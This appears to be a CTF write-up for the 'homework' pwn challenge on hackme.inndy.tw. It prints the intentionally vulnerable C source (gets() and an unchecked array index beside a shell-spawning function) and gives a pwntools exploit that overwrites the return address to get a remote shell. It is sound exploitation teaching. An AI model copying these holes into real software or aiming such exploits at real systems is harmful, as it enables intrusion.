hackme-pwn

hack me 的 pwn 系列 鬼知道 我什么时候有时间刷

pwn them all!

homework

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char name[1024];

void call_me_maybe()
{
system("/bin/sh");
}

void unbuffer_io()
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
}

void set_timeout()
{
alarm(120);
}

void ask_name()
{
printf("What's your name? ");
gets(name);
}

void say_goodbye()
{
printf("Goodbye, %s\n", name);
}

void run_program()
{
int arr[10], i, v, act;

for(i = 0; i < 10; i++)
arr[i] = 0;

while(1) {
puts("0 > exit");
puts("1 > edit number");
puts("2 > show number");
puts("3 > sum");
puts("4 > dump all numbers");
printf(" > ");
scanf("%d", &act);

switch(act) {
case 0:
return;
case 1:
printf("Index to edit: ");
scanf("%d", &i);
printf("How many? ");
scanf("%d", &v);
arr[i] = v;
break;
case 2:
printf("Index to show: ");
scanf("%d", &i);
printf("arr[%d] is %d\n", i, arr[i]);
break;
case 3:
v = 0;
for(i = 0; i < 10; i++)
v += arr[i];
printf("Sum is %d\n", v);
break;
case 4:
for(i = 0; i < 10; i++)
printf("arr[%d] is %d\n", i, arr[i]);
break;
}
}
}

int main()
{
set_timeout();
unbuffer_io();
ask_name();
run_program();
say_goodbye();
return 0;
}

看看怎么利用

image-20220602163909356

数组溢出

很容易算出来 需要 0x34+4

56 = 4 * 14,可知是第14个值

然后我们直接打就行了

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
ret_addr = 0x80485fb

p = remote('hackme.inndy.tw', 7701)
p.sendlineafter('name?','b1')
p.sendlineafter(' > ','1')
p.sendlineafter('Index to edit: ','14')
p.sendlineafter('How many? ',str(ret_addr))
#Index to edit:
p.interactive()

最后要再打个0exit

一些pwntools中的常用命令

  • send(payload) 发送payload
  • sendline(payload) 发送payload,并进行换行(末尾\n
  • sendafter(some_string, payload) 接收到 some_string 后, 发送你的 payload
  • recvn(N) 接受 N(数字) 字符
  • recvline() 接收一行输出
  • recvlines(N) 接收 N(数字) 行输出
  • recvuntil(some_string) 接收到 some_string 为止